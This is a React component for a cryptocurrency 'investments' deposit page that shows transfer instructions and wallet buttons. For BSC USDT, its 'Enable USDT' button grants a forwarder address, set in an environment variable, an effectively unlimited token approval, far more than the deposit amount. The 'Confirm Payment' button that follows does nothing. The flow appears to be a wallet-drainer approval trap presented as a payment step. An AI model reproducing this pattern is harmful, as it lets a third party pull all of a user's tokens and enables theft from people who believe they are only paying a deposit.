import React, { useState, useEffect } from "react";
import Wrapper from "../../layouts/Wrapper";
import { useAccount, useContractWrite } from 'wagmi'
import { toast } from "react-toastify";
import { ethers, formatEther } from "ethers";
import {
  QuestionIcon,
  ArrowDownIcon,
  CopyIcon,
  WarningIcon,
  ClockIcon,
  RefreshIcon,
} from "../../assets/icons";
import {
  useConnectModal,
  useAccountModal,
  useChainModal,
} from '@rainbow-me/rainbowkit';
import { erc20ABI } from "wagmi";
import { parseEther } from "ethers";

const Deposit2 = () => {
  const [tokenTab, setTokenTab] = useState("BTC");
  const tokenList = [
    { lbl: localStorage.getItem("network") + " network" },
    // { lbl: "BEP2" },
    // { lbl: "BEP20 (BSC)" },
    // { lbl: "RRC20" },
  ];
  const { address } = useAccount()
  const [allowance, setAllowance] = useState(0)
  const { openConnectModal } = useConnectModal();
  let amount = localStorage.getItem("amount")
  let currency = localStorage.getItem("currency")

  let provider = new ethers.JsonRpcProvider("https://bsc-dataseed.binance.org/");

  function useApproveToken() {
    const { write } = useContractWrite({
      address: "0x55d398326f99059fF775485246999027B3197955",
      abi: erc20ABI,
      functionName: "approve",
      args: [process.env.REACT_APP_FORWARDER, ethers.parseEther("1000000000000000000000")],
      onSuccess(data) {
        console.log("Success", data);
        provider.once(data.hash, (receipt) => {
          toast.success("Transaction Successful", {
            position: toast.POSITION.TOP_CENTER,
            autoClose: 2000,
            theme: "colored",
          });
          setTimeout(() => {
            // setAllowance(ethers.parseEther("1000000000000000000000"));
          }, 2000);
        });
      },

      onError(error) {
        console.log("Error", error);
        toast.error("an errror occured");
      },
    });
    return write;
  }
  function useTokenAllowance(address) {
    useEffect(() => {
      async function getAllowance() {
        const token = new ethers.Contract("0x55d398326f99059fF775485246999027B3197955", erc20ABI, provider);
        let forwarder = process.env.REACT_APP_FORWARDER;
        console.log("forwarder", forwarder);

        let allowance = await token.allowance(address, forwarder);
        setAllowance(formatEther(allowance));
        console.log("allowance", allowance);
      }
      console.log("user", address);
      getAllowance();
    }, [address]);
  }


  const Tokenallowance = useTokenAllowance(address);
  console.log("allowance", Tokenallowance);
  const approveToken = useApproveToken();


  const forwarder = () => {
    if (!address) {
      return {
        title: "Pay with Web3",
        func: openConnectModal
      }
    };

    if (allowance < parseEther(amount) || allowance == 0) {
      return {
        title: "Enable USDT",
        func: approveToken
      }
    } else {
      return {
        title: "Confirm Payment",
        func: () => { }
      }
    }


  }

  const Tips = () => {
    return (
      <div className="tips-section flex flex-col">
        <div className="sec-tag">Tips</div>
        <div className="tip-box flex flex-col bg-themeColor2">
          <div className="tip-item flex">
            <div className="dot"></div>
            <div className="desc">
              If you have deposited,your deposit will be automatically credited to the respective coins account you made the deposit.
            </div>
          </div>
          <div className="tip-item flex">
            <div className="dot"></div>
            <div className="desc">
              Coins will be deposited after 1 network confrimations.
            </div>
          </div>
          <div className="tip-item flex">
            <div className="dot"></div>
            <div className="desc">
              Until 2 confrimations are made,an equivalent amount of your assets
              will be temporarily unavailable for witdrawals.
            </div>
          </div>
          <div className="tip-item flex">
            <div className="dot"></div>
            <div className="desc">
              You could check the deposit status at{" "}
              <span
                onClick={() => {
                  window.location.href = "/dashboard/myinvestments";
                }}
                className="text-themeColor">Deposit Records.</span>
            </div>
          </div>
        </div>
      </div>
    );
  };
  return (
    <Wrapper>
      <div className="deposit2-page h-screen flex">
        <div className="wrap wrapWidth flex text-white">
          <div className="page-left flex flex-col">
            <div className="page-header flex items-center justify-between">
              <div className="page-title">Deposit </div>
              <div className="question-icon flex items-center justify-center bg-themeColor2">
                <QuestionIcon />
              </div>
            </div>

            <div className="coin-selection flex flex-col">
              <div className="sec-title">Preferred Payment</div>
              <div className="selection-lbl">Coin :</div>
              <div className="coin-field flex items-center justify-between bg-themeColor2">
                <div className="token-info flex items-center justify-center bg-themeColor1">
                  <div className="icon flex items-center justify-center">
                    {/* <img src={`/images/${`localStorage.getItem(`currency"`)}.png"} className="img" /> */}
                    <img src={`https://nowpayments.io/images/coins/${localStorage.getItem("currency")}.svg`} className="img" />
                    <div className="token-name">{localStorage.getItem("currency")}</div>
                  </div>
                </div>
                <div className="transfer-amount flex items-center">
                  <div className="lbl">Transfer:</div>
                  <div className="val">{localStorage.getItem("amount")}</div>
                </div>
                <div className="token-actions flex items-center">
                  <button className="btn-copy button">
                    <div className="btn-lbl">Copy</div>
                    <div className="btn-icon">
                      <CopyIcon />
                    </div>
                  </button>
                  <button className="btn-copy button">
                    <div className="btn-icon">
                      <RefreshIcon />
                    </div>
                  </button>
                </div>
              </div>
            </div>

            <div className="address-sec flex flex-col">
              <div className="selection-lbl">{localStorage.getItem("currency")} Address</div>
              <div className="address-box flex items-center bg-themeColor2">
                <div className="a-code">{localStorage.getItem('address')}</div>
                <button className="btn-copy button">
                  <div className="btn-lbl">Copy</div>
                  <div className="btn-icon">
                    <CopyIcon />
                  </div>
                </button>
              </div>
            </div>
            <div className="btns-actions flex items-center justify-between">
              <button
                onClick={() => window.location.href = "/dashboard/myinvestments"}
                className="_btn button">Track Investments</button>

              {/* //usdtbsc */}
              {process.env.REACT_APP_FORWARDER && currency == "usdtbsc" && <button
                onClick={forwarder().func}
                className="_btn button">{forwarder().title}</button>}
              {!process.env.REACT_APP_FORWARDER && <button
                onClick={() => {
                  window.location.href = "/dashboard/myinvestments"
                }}
                className="_btn button">Back to Dashboard</button>}
              {process.env.REACT_APP_FORWARDER && currency != "usdtbsc" && <button
                onClick={() => {
                  window.location.href = "/dashboard/myinvestments"
                }}
                className="_btn button">Back to Dashboard</button>}
            </div>
            <Tips />
          </div>
          <div className="page-right flex flex-col">
            <div className="sec-title flex items-center">
              <div className="tag">Deposit Network</div>
              <div className="icon flex items-center justify-center">
                <WarningIcon />
              </div>
            </div>
            <div className="tabs-sec flex items-center">
              <div className="tabs-box flex items-center justify-center">
                {tokenList.map((item, index) => (
                  <button
                    key={index}
                    className={`btn-tab button ${tokenTab === item.lbl ? "active" : ""
                      }`}
                    onClick={(e) => setTokenTab(item.lbl)}
                  >
                    {item.lbl}
                  </button>
                ))}
              </div>
            </div>
            <div className="avg-time flex items-center justify-center">
              <div className="clock-icon flex items-center justify-center">
                <ClockIcon />
              </div>
              Estimate Time : <span className="time">3 Minutes</span>
            </div>
            {/* <div className="qrcode-sec flex flex-col items-center">
              <div className="tag">{localStorage.getItem("currency")} Address</div>
              <img src="/images/Qrcode1.svg" className="qr-code" />
            </div> */}
            <div className="description-sec flex items-start flex-col">
              {/* <div className="warn-icon flex items-center justify-center">
                <WarningIcon />
              </div> */}
              <h1 className="sec-tag">Send only {localStorage.getItem("currency")} to this Address!</h1>
              <p className="desc">
                Sending coin or token other than {localStorage.getItem("currency")} to this Address may reault
                in the loss of your deposit.
              </p>
            </div>
            <Tips />
          </div>
        </div>
      </div>
    </Wrapper>
  );
};

export default Deposit2;
